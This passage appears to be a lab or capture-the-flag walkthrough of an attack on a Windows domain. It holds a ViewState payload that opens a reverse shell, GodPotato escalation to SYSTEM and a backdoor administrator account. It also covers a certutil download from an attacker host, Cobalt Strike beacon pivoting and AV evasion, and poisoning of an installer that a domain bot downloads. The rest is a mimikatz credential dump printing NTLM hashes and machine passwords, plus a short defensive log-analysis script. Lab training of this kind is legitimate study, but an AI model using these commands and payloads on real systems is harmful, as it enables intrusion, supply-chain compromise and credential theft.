%2B0jRGZLMAMdn6gC4vhPG0z95fsp82joA1Ko7QSiTua63Qh8cxhTzKtZmlWmS31cBiw0Ny31zGLj5ud2106FjPDx90LXSTKC9EOGBB1tFwqUfJHgfIhGZCPLBAjAebac0UKLfDjCHD0mLXAWBiHClKYH4uZ1IN%2Fmp3yQlRZPfEYEpCELmeSbkRYDZ25cKVhKQ0fdkPS2smEnZ2XlboWwNSuGQ8gGnCorWsIRgCOycfbesrauZnpQJ8z012MHfzeJlTuWvpu1UbZ48429IJVWkcTMYYU%2FYww63nD2LgYABzLvpWbqb59dIwLpUExLtbv1WXhjLUXNQAMvU4dK43BROnYKBYiN3XJjROUL0RWNrL0Auf9uww8g%3D%3D
Then start a listener first and send a POST request to 172.22.20.38/download,
with __VIEWSTATE as the parameter name and the generated payload as its value.
The payload is below; it sends a reverse shell to 172.22.10.17:9999.
__VIEWSTATE=HN4qiIWy4C2hO9AieD3JBv0w5vlgyIah8lb1eGbNQQMT%2FWRxgusmkIx9GlCXWm7q9gIUhVafMLZlncfJMAA49C1PGa1pXuNgCJvSDKqs62BYDN7dG987veFnWMVOcpNfk9ehTGZu1thELVaTlyoYan58Vh5OrYx0K50VkJ9ivtZrxQ2%2Bo9fPSk%2Bgoq8ExcsGPjOdbsaW2VpDjh%2BGLN%2FU6Pth4g2GeQmFzbvOrHG9i3Hl2hc8laOHoX44%2FUWAKrlsOz6JuN1Ib9Heg2HKHxx%2F9RGElCeLZNZqF6dpRlgnqJ%2FVRB6N5vGRA7UGXcznMADpdWyma5dRRE7HQXjhXuuFA2nsDvo6zgYjXhNO9PJj2f4mHnTK6AQ%2FF0YhqwjxtJ1FqDpZpBsjRQ69QDKP9WLY28Gnv3Uo6KJlxehqPsLNHWdCqDlB1VhHqwaIJ8mzbZgfXshoyVBwlHBF6WCxfAmVQn72EzVuWDOSqhdpTxbHqe%2F6sGkzrJdUXqfLGwDJ90LfwhtztPyVNAb9giJykE65bZjn4NhLkZgXgLRNFAnkeuG7ljgBwO%2FWEnrViK61w4vl%2FWnS3bSPRVacoSCp1bHkHDxslw3o3wIQM7j9CFlX%2Fb20RZG5RvLFAomzTZrsOLL9k56o20fLJlUpL3L5P6NaPXMzLmN9HGHOkiU%2B59uzY0JkQpmOt76vFSe2IdehwMQF3MKSAjU6mIIlWmzNU3P%2Fy3TnBIoblRe7uOde62T3gfTaKsYcK2zay9kmLF1r1HdaqgVyT2HiX%2FsCy4uWSQxhg348lfYPWJxAbdhJMX%2F0rLzAyYgezgRs4DT7Mt%2FNjgP0FzaX9roVsssgtloyWmBnloM%2B1WhmDzwMyaxw%2BULZNK5t5YXGD1jwlKQlG5p2kK%2Fto7D6FB91r6IyjmaMZckoFhJGXFzM8%2BhVJq%2Fa9YxOyhpzrSItInfr0RFiQh8E4GoQa5biLi%2FnOMdB5cC5u20ADZIFdb8rf4dff5V89aswMmQLYZrnaWu9uKmDf05YVmGrTvfWLqSM8SVrGjKhvaP0tTO0B1Tfij%2Bhlkoogphf03yZykHMgOxXX9exYB8pX5Rqkhiri%2B%2FJMBuAGnaukXOa7k8tXdEudrcCY66LYiSb23Lx4J8ACZJ3ZxfVkRCtZedE%2Bby4eHHjmnGs7VZviaXxXaw8VmaUL7ygB%2FCc1i8whvgMc33wCtmGxx6bebEWnZjDi8bVWovHamhRnuDXqcAeGGqxSguwleZBTvtwgBs8EaZqHlJ0jpPCHoVXHQh3iycRqKE91SbptHuQZXCsWOnz6Zsm8dMSeksVSu9tThgaApP8X%2FY7B%2FkEQNVDylho%2F5VDtKYhOo%2FIpCrARU3EiPebFvU6kk97iHquWee7Aof99fCMs3YsMn8queVwweLuVoHNLmpGTOZFmpBNvvmjmQUp5t0q%2Fbf5Er3DKRFJwBGy3BluLo0AIPI7L8o%2FzFor1M3m%2BBXkW00QbxtsOGB3BFj4yDHgjxk6GuP%2BqVDpW2pXFvgUis2YHWZPN169XsA5NzlfcvekgzmnJSi5iyoc6G0MyqkpWSJGAS%2Fzot7cY5Bhe7biKgKh57lnnA%2FMh9%2B84d2f1STZdOCOGeOzG16E3DbQlNuxIpy8cFhs5O2M0u%2BlxuBTVvPiWg5OhgyyADHNwuBjXhaFDEFMXYw6%2FOlVaeM2tzunNaz9ynFwkG3D0n42H9cDED4BFPQeEF6hdVWnTiRI1AG5jCX1IiYW9gBYHe67e5mRlimUxLarKQEUutuBGTmpT1f1H2BbGd6HqB4pFMcCJMqFYwIWBFTpHuTSOi0TXNWdxu9xre61%2B2ZB6SRI1fD876YSQuEunM2Vn6v2VvuifAbEf2JApQzVMIz78em13aHEpZPJtNKPiqu8XSocNxxJQb
quutz8iCZA%2FQQqhgKul0xwmH6e26f8cno1i%2F75vzB%2FqxOQpD%2FSoc4hTZx7LM7%2FMIag%2B7Lf6DJ8R%2FnKyslPKjWped4US%2By2jwzx8YzyccXzoqOh0XNNizhHChgp9Go5OV%2FSB6AML%2FU%2Bn0I1JZaaW%2FUD7LPG%2BYi45MCOCPiFUSLrpKSQxUMY%2Fy8092r2OcLlyRa%2BCA0r5PkYEqJvOFafs2bhCbcBD9%2FftmPkXP1%2Fwu5hviqN%2Favs0QNe4%2F1FEcqEW85xc4%2BcNiYMLx5SbYGytz7QMj%2FHPYqvuIbaob06YiTmt1NaoCJlL0vjh0souyAuh3lo5HJZJGbK9j%2FLMCIrsEKElUX5lT7SJdpEvBnzghrSyz019AtbVbqR3CPFIQI0qNKrqoepYW0q99joVw%2Bl6fOuXjPqoTy4vyU0FbpQokfFAaZD6evBd4i84hiLLAsaybz5oNg2Wc8DV6vZdiMnTh3kvvHdl3Y9emtVdLXrwv%2Bzw87IIX%2Fhpr8CF0ChvYwhVcFy13VhNu8xZ0VYst18z%2BvKPqevBTpuhMGl6MlFC6rqmFpA7O5pmiVk0wT1Th6iDcB2reFIr9bFF9jSKne9MFOXXvWhpW1RzXvcWr%2FR4vwJOrAj7H3LaF1xQkMACDpZi9KfG4iDmNpnWU4QYqY8itNF3bXtLFjtqMIRjQY7FOwgYanzbIwnTBjSfF%2BbUp2%2BgE63UhcXlE%2B71LJxNKKn31cSGCGxz2pt4vOwtmUHWrHMmWv6pqI%2BfdRAa5wniBeBSEUFxUrqoUVVOA8X3QAphtvhdAwn733lmaFi%2Fcq%2B0jRGZLMAMdn6gC4vhPG0z95fsp82joA1Ko7QSiTua63Qh8cxhTzKtZmlWmS31cBiw0Ny31zGLj5ud2106FjPDx90LXSTKC9EOGBB1tFwqUfJHgfIhGZCPLBAjAebac0UKLfDjCHD0mLXAWBiHClKYH4uZ1IN%2Fmp3yQlRZPfEYEpCELmeSbkRYDZ25cKVhKQ0fdkPS2smEnZ2XlboWwNSuGQ8gGnCorWsIRgCOycfbesrauZnpQJ8z012MHfzeJlTuWvpu1UbZ48429IJVWkcTMYYU%2FYww63nD2LgYABzLvpWbqb59dIwLpUExLtbv1WXhjLUXNQAMvU4dK43BROnYKBYiN3XJjROUL0RWNrL0Auf9uww8g%3D%3D
Shell obtained.
Checking the current user's privileges shows SeImpersonatePrivilege, so GodPotato can be used directly to escalate to SYSTEM.
GitHub - BeichenDream/GodPotato
PS C:\users> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
First upload the GodPotato-NET4.exe you downloaded to the Ollama machine and start a Python HTTP server.
root@Ollama :~# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Then, in the reverse shell on the IIS machine, run the following command to download the file (first change to a directory you can write to, such as c:\users\public).
PS C:\users\public> certutil -f -split -urlcache http://172.22.20.11:80/GodPotato-NET4.exe
**** ?? ****
0000 ...
e000
CertUtil: -URLCache ???????
Once downloaded, commands can be run with SYSTEM privileges.
PS C:\users\public> ./GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140710481690624
[*] DispatchTable: 0x140710484277576
[*] UseProtseqFunction: 0x140710483570880
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\a633439e-1ba0-4b6b-a7ab-ab019ab9d5db\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00009802-1310-ffff-4356-c4d312ef7816
[*] DCOM obj OXID: 0x3c6f5a43700a3f45
[*] DCOM obj OID: 0x7da3352dee4bc3ae
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 852 Token:0x784 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1072
nt authority\system
Then create a local administrator user so we can RDP in directly.
PS C:\users\public> ./GodPotato-NET4.exe -cmd "cmd /c net user c1trus Admin123 /add && net localgroup administrators c1trus /add"
[*] CombaseModule: 0x140710481690624
[*] DispatchTable: 0x140710484277576
[*] UseProtseqFunction: 0x140710483570880
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\6809a09c-2889-4890-8986-92b263b0ff4f\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00003402-08a8-ffff-c9ca-67a62fed70e4
[*] DCOM obj OXID: 0x85471666e10490a3
[*] DCOM obj OID: 0x1f14e15b496bcc0b
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 852 Token:0x784 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3668
???????
???????
PS C:\users\public> net users
\\FPSRVIIS03 ?????
-------------------------------------------------------------------------------
Administrator c1trus DefaultAccount
Guest WDAGUtilityAccount WDeployAdmin
WDeployConfigWriter
???????
Connect over RDP with c1trus / Admin123.
Once in, the flag and the hint for the next step can be found on the Administrator's desktop.
The Word document notifies domain users to visit the internal download system IntraFetch and download the new version of Visual Studio.
That IntraFetch site is deployed on this very machine, and the download resources it serves can be seen under C:\Tools\. The site source also confirms that the files it serves are located in C:\Tools\.
Also, under C:\inetpub\logs\LogFiles\W3SVC2 the IIS logs show a bot on a domain machine (172.22.20.165) requesting the site's /Download file=VisualStudioSetup.exe URL every 2 minutes, i.e. downloading VisualStudioSetup.exe.
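The scheduled fetch the author noticed by reading W3SVC2 is exactly the kind of pattern a defender should be extracting from IIS logs routinely: a client that pulls the same executable on a fixed timer is a client whose integrity depends on that file never being swapped. The following is an added example (not from the write-up) that parses W3C extended log entries and reports clients with a regular fetch period; the log excerpt is constructed to mirror the described pattern (172.22.20.165 requesting /Download?file=VisualStudioSetup.exe every two minutes), and the user agents and exact timestamps are invented. IIS writes W3C timestamps in UTC unless configured otherwise.

```python
"""Find clients that request the same URL on a fixed schedule in IIS W3C logs.

Added example, not from the write-up. SAMPLE_LOG is constructed to mirror the pattern
described for W3SVC2; user agents and timings are invented.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2025-11-09 01:50:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-11-09 01:50:01 172.22.20.38 GET /Download file=VisualStudioSetup.exe 8080 - 172.22.20.165 constructed-fetcher/1.0 - 200 0 0 412
2025-11-09 01:51:12 172.22.20.38 GET / - 8080 - 172.22.20.11 Mozilla/5.0 - 200 0 0 9
2025-11-09 01:52:02 172.22.20.38 GET /Download file=VisualStudioSetup.exe 8080 - 172.22.20.165 constructed-fetcher/1.0 - 200 0 0 398
2025-11-09 01:53:30 172.22.20.38 GET /Download file=VisualStudioSetup.exe 8080 - 172.22.20.11 Mozilla/5.0 - 200 0 0 401
2025-11-09 01:54:01 172.22.20.38 GET /Download file=VisualStudioSetup.exe 8080 - 172.22.20.165 constructed-fetcher/1.0 - 200 0 0 405
2025-11-09 01:56:02 172.22.20.38 GET /Download file=VisualStudioSetup.exe 8080 - 172.22.20.165 constructed-fetcher/1.0 - 200 0 0 410
2025-11-09 01:58:01 172.22.20.38 GET /Download file=VisualStudioSetup.exe 8080 - 172.22.20.165 constructed-fetcher/1.0 - 200 0 0 399
"""


def parse_iis_log(text):
    """Turn W3C extended log text into dicts keyed by the names in the #Fields directive."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()  # the field list may change mid-file
            continue
        if not line.strip() or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log entry before any #Fields directive")
        parts = line.split()
        if len(parts) != len(fields):
            continue  # truncated or corrupt entry; IIS escapes spaces as '+', so counts normally match
        records.append(dict(zip(fields, parts)))
    return records


def find_periodic_fetches(text, min_hits=3, max_jitter=0.2):
    """Group requests by (client, path, query) and report groups whose gaps all lie
    within max_jitter of the median gap. Findings are sorted by period."""
    stamps_by_key = defaultdict(list)
    for rec in parse_iis_log(text):
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        stamps_by_key[(rec["c-ip"], rec["cs-uri-stem"], rec["cs-uri-query"])].append(ts)

    findings = []
    for (client, stem, query), stamps in stamps_by_key.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(stamps, stamps[1:])]
        period = median(gaps)
        if period <= 0:
            continue
        if max(abs(g - period) for g in gaps) / period <= max_jitter:
            findings.append({"client": client, "uri": stem, "query": query,
                             "hits": len(stamps), "period_s": period})
    return sorted(findings, key=lambda f: f["period_s"])


if __name__ == "__main__":
    for f in find_periodic_fetches(SAMPLE_LOG):
        print(f"{f['client']} fetches {f['uri']}?{f['query']} every {f['period_s']:.0f}s ({f['hits']} hits)")
```

Against a real W3SVC2 directory, concatenate the u_ex*.log files and feed the text in; the interactive browsing from 172.22.20.11 in the sample is ignored because it has no stable period. For a defender the output is the list of endpoints whose unattended downloads need a signature or hash check on the client side, since an automated fetcher will run whatever the share or site hands it.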
You will also notice a Huorong installer in C:\Tools\, so it is reasonable to guess that the machine may have antivirus installed.
Because the target environment cannot reach the internet, the only way to get a beacon is a bind (forward) connection, and your own machine also has to serve as a relay.
First open your CS, generate a beacon locally and run it so that your own machine checks in.
Then generate a bind (forward) beacon, upload it to the 172.22.20.38 IIS server (the machine we RDP'd into) and run it.
In CS, use your own machine's beacon to run connect 172.22.20.38 12345; 172.22.20.38 then comes online.
Then use the 172.22.20.38 beacon as a pivot listener and generate a reverse payload.bin.
Open the 掩日 (Evasion as a Service) site and upload your payload.bin; choosing the free option 1 produces an AV-evading executable for you (you can of course use your own evasion method instead).
Rename the generated exe to VisualStudioSetup.exe and replace the VisualStudioSetup.exe in C:\Tools\; after a short wait the machine checks in.
Before moving laterally to the next machine, we can first collect domain information with SharpHound and analyze it with BloodHound.
Collecting domain information requires communicating with the domain controller, so we first need to escalate to SYSTEM.
Upload psexec.exe to go from administrator to SYSTEM.
PsExec - Sysinternals | Microsoft Learn
psexec.exe -i -s cmd.exe # open a cmd.exe running as SYSTEM
Then upload SharpHound.exe and run it from the SYSTEM cmd.exe to collect domain information.
GitHub - SpecterOps/SharpHound: C# Data Collector for BloodHound
PS C:\users\public> ./SharpHound.exe -c all
2025-11-09T02:57:17.2220289+08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
...<SNIP>...
1 name to SID mappings.
3 machine sid mappings.
3 sid to domain mappings.
0 global catalog mappings.
2025-11-09T02:57:23.0500191+08:00|INFORMATION|SharpHound Enumeration Completed at 2:57 on 2025/11/9! Happy Graphing!
Then analyze the attack paths in the domain with BloodHound.
GitHub - SpecterOps/BloodHound: Six Degrees of Domain Admin
It is easy to see that the user LIU654 is very valuable.
If we can obtain LIU654's credentials, we are basically done.
Here we can also upload mimikatz.exe to dump the hashes and plaintext passwords on this machine.
GitHub - gentilkiwi/mimikatz: A little tool to play with Windows security
C:\Users\Administrator\Desktop> .\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # log
Using 'mimikatz.log' for logfile : OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 1527143 (00000000:00174d67)
Session : RemoteInteractive from 2
User Name : c1trus
Domain : FPSRVIIS03
Logon Server : FPSRVIIS03
Logon Time : 2025/11/9 2:45:35
SID : S-1-5-21-968187407-3797406681-3416851469-1002
msv :
[00000003] Primary
* Username : c1trus
* Domain : FPSRVIIS03
* NTLM : e45a314c664d40a227f9540121d1a29d
* SHA1 : 68d2cbb7f15aec345fbf42a6326ddfee03e61708
* DPAPI : 68d2cbb7f15aec345fbf42a6326ddfee
tspkg :
wdigest :
* Username : c1trus
* Domain : FPSRVIIS03
* Password : (null)
kerberos :
* Username : c1trus
* Domain : FPSRVIIS03
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 1526996 (00000000:00174cd4)
Session : RemoteInteractive from 2
User Name : c1trus
Domain : FPSRVIIS03
Logon Server : FPSRVIIS03
Logon Time : 2025/11/9 2:45:35
SID : S-1-5-21-968187407-3797406681-3416851469-1002
msv :
[00000003] Primary
* Username : c1trus
* Domain : FPSRVIIS03
* NTLM : e45a314c664d40a227f9540121d1a29d
* SHA1 : 68d2cbb7f15aec345fbf42a6326ddfee03e61708
* DPAPI : 68d2cbb7f15aec345fbf42a6326ddfee
tspkg :
wdigest :
* Username : c1trus
* Domain : FPSRVIIS03
* Password : (null)
kerberos :
* Username : c1trus
* Domain : FPSRVIIS03
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 53652 (00000000:0000d194)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/11/9 1:44:32
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : e7a5bbbec82b57fd5b325ea667ede2ec
* SHA1 : 5f83a7d3fc5110dc43c8531488218ea38ee3604d
* DPAPI : 5f83a7d3fc5110dc43c8531488218ea3
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : FPSRVIIS03$
* Domain : fpcorp.int
* Password : U[/D2d/_K4.XamwHCA'O5gAN\UNu#]xlUC #WmL1Oz5iir (D;? 8sQ@s2wF ()rS4XwL]kG-<QHb!.DF2WK'(bu6XG0<48R&xewHuf[\V_9TRvHypkjJpmKZnY,
ssp :
credman :
cloudap :
Authentication Id : 0 ; 53634 (00000000:0000d182)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/11/9 1:44:32
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : FPSRVIIS03$
* Domain : fpcorp.int
* Password : 62 b2 c3 0d 1e fe de 84 f7 35 33 57 c3 b0 1b e1 e0 9d 5d 8a 06 a1 11 a7 93 08 18 1f 64 3a 40 2e 75 b2 3f ec 47 dd 59 62 e6 95 5d 7a 72 9e 71 36 78 2d 06 63 17 4c 54 e1 99 c2 24 09 6f d0 67 de 45 ac 9d a9 fb 91 bc 82 bb 75 83 52 5a a8 ef 3e 0e af 74 6e 80 ea 6e 6f d4 16 97 7b f2 a2 ce ce c7 08 f2 fc ad cd 84 71 d8 e2 b9 24 bf 42 9d 5f 0c 6a 6b f9 81 34 09 2d 7b 9a 26 16 dc b4 bf 02 96 a3 40 7e 23 ea 0a 13 fb a6 17 b0 14 c2 89 a0 b3 fc 38 8d 25 aa a5 43 18 8b 5d 83 d0 e8 46 cf 4a 76 80 9b c8 d6 ff 7e 13 89 42 78 74 63 5e cb 06 02 9f 28 02 9c 06 bc f9 a2 74 62 70 ad e8 3d d4 38 00 39 85 a9 26 e5 f2 02 2b d4 a0 4b 14 13 e1 06 de d7 91 14 07 c3 0a b5 33 47 c3 09 d4 07 9b 19 12 82 1d 6f 7a 8b ef b0 fa 0e 15 02 9c 14
ssp :
credman :
cloudap :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : FPSRVIIS03$
Domain : FPCORP
Logon Server : (null)
Logon Time : 2025/11/9 1:44:31
SID : S-1-5-20
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : fpsrviis03$
* Domain : FPCORP.INT
* Password : 62 b2 c3 0d 1e fe de 84 f7 35 33 57 c3 b0 1b e1 e0 9d 5d 8a 06 a1 11 a7 93 08 18 1f 64 3a 40 2e 75 b2 3f ec 47 dd 59 62 e6 95 5d 7a 72 9e 71 36 78 2d 06 63 17 4c 54 e1 99 c2 24 09 6f d0 67 de 45 ac 9d a9 fb 91 bc 82 bb 75 83 52 5a a8 ef 3e 0e af 74 6e 80 ea 6e 6f d4 16 97 7b f2 a2 ce ce c7 08 f2 fc ad cd 84 71 d8 e2 b9 24 bf 42 9d 5f 0c 6a 6b f9 81 34 09 2d 7b 9a 26 16 dc b4 bf 02 96 a3 40 7e 23 ea 0a 13 fb a6 17 b0 14 c2 89 a0 b3 fc 38 8d 25 aa a5 43 18 8b 5d 83 d0 e8 46 cf 4a 76 80 9b c8 d6 ff 7e 13 89 42 78 74 63 5e cb 06 02 9f 28 02 9c 06 bc f9 a2 74 62 70 ad e8 3d d4 38 00 39 85 a9 26 e5 f2 02 2b d4 a0 4b 14 13 e1 06 de d7 91 14 07 c3 0a b5 33 47 c3 09 d4 07 9b 19 12 82 1d 6f 7a 8b ef b0 fa 0e 15 02 9c 14
ssp :
credman :
cloudap :
Authentication Id : 0 ; 29050 (00000000:0000717a)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/11/9 1:44:31
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : FPSRVIIS03$
* Domain : fpcorp.int
* Password : 62 b2 c3 0d 1e fe de 84 f7 35 33 57 c3 b0 1b e1 e0 9d 5d 8a 06 a1 11 a7 93 08 18 1f 64 3a 40 2e 75 b2 3f ec 47 dd 59 62 e6 95 5d 7a 72 9e 71 36 78 2d 06 63 17 4c 54 e1 99 c2 24 09 6f d0 67 de 45 ac 9d a9 fb 91 bc 82 bb 75 83 52 5a a8 ef 3e 0e af 74 6e 80 ea 6e 6f d4 16 97 7b f2 a2 ce ce c7 08 f2 fc ad cd 84 71 d8 e2 b9 24 bf 42 9d 5f 0c 6a 6b f9 81 34 09 2d 7b 9a 26 16 dc b4 bf 02 96 a3 40 7e 23 ea 0a 13 fb a6 17 b0 14 c2 89 a0 b3 fc 38 8d 25 aa a5 43 18 8b 5d 83 d0 e8 46 cf 4a 76 80 9b c8 d6 ff 7e 13 89 42 78 74 63 5e cb 06 02 9f 28 02 9c 06 bc f9 a2 74 62 70 ad e8 3d d4 38 00 39 85 a9 26 e5 f2 02 2b d4 a0 4b 14 13 e1 06 de d7 91 14 07 c3 0a b5 33 47 c3 09 d4 07 9b 19 12 82 1d 6f 7a 8b ef b0 fa 0e 15 02 9c 14
ssp :
credman :
cloudap :
Authentication Id : 0 ; 29016 (00000000:00007158)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/11/9 1:44:31
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : FPSRVIIS03$
* Domain : fpcorp.int
* Password : 62 b2 c3 0d 1e fe de 84 f7 35 33 57 c3 b0 1b e1 e0 9d 5d 8a 06 a1 11 a7 93 08 18 1f 64 3a 40 2e 75 b2 3f ec 47 dd 59 62 e6 95 5d 7a 72 9e 71 36 78 2d 06 63 17 4c 54 e1 99 c2 24 09 6f d0 67 de 45 ac 9d a9 fb 91 bc 82 bb 75 83 52 5a a8 ef 3e 0e af 74 6e 80 ea 6e 6f d4 16 97 7b f2 a2 ce ce c7 08 f2 fc ad cd 84 71 d8 e2 b9 24 bf 42 9d 5f 0c 6a 6b f9 81 34 09 2d 7b 9a 26 16 dc b4 bf 02 96 a3 40 7e 23 ea 0a 13 fb a6 17 b0 14 c2 89 a0 b3 fc 38 8d 25 aa a5 43 18 8b 5d 83 d0 e8 46 cf 4a 76 80 9b c8 d6 ff 7e 13 89 42 78 74 63 5e cb 06 02 9f 28 02 9c 06 bc f9 a2 74 62 70 ad e8 3d d4 38 00 39 85 a9 26 e5 f2 02 2b d4 a0 4b 14 13 e1 06 de d7 91 14 07 c3 0a b5 33 47 c3 09 d4 07 9b 19 12 82 1d 6f 7a 8b ef b0 fa 0e 15 02 9c 14
ssp :
credman :
cloudap :
Authentication Id : 0 ; 27795 (00000000:00006c93)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/11/9 1:44:31
SID :
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
kerberos :
ssp :
credman :
cloudap :
Authentication Id : 0 ; 1485910 (00000000:0016ac56)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/11/9 2:45:34
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : FPSRVIIS03$
* Domain : fpcorp.int
* Password : 62 b2 c3 0d 1e fe de 84 f7 35 33 57 c3 b0 1b e1 e0 9d 5d 8a 06 a1 11 a7 93 08 18 1f 64 3a 40 2e 75 b2 3f ec 47 dd 59 62 e6 95 5d 7a 72 9e 71 36 78 2d 06 63 17 4c 54 e1 99 c2 24 09 6f d0 67 de 45 ac 9d a9 fb 91 bc 82 bb 75 83 52 5a a8 ef 3e 0e af 74 6e 80 ea 6e 6f d4 16 97 7b f2 a2 ce ce c7 08 f2 fc ad cd 84 71 d8 e2 b9 24 bf 42 9d 5f 0c 6a 6b f9 81 34 09 2d 7b 9a 26 16 dc b4 bf 02 96 a3 40 7e 23 ea 0a 13 fb a6 17 b0 14 c2 89 a0 b3 fc 38 8d 25 aa a5 43 18 8b 5d 83 d0 e8 46 cf 4a 76 80 9b c8 d6 ff 7e 13 89 42 78 74 63 5e cb 06 02 9f 28 02 9c 06 bc f9 a2 74 62 70 ad e8 3d d4 38 00 39 85 a9 26 e5 f2 02 2b d4 a0 4b 14 13 e1 06 de d7 91 14 07 c3 0a b5 33 47 c3 09 d4 07 9b 19 12 82 1d 6f 7a 8b ef b0 fa 0e 15 02 9c 14
ssp :
credman :
cloudap :
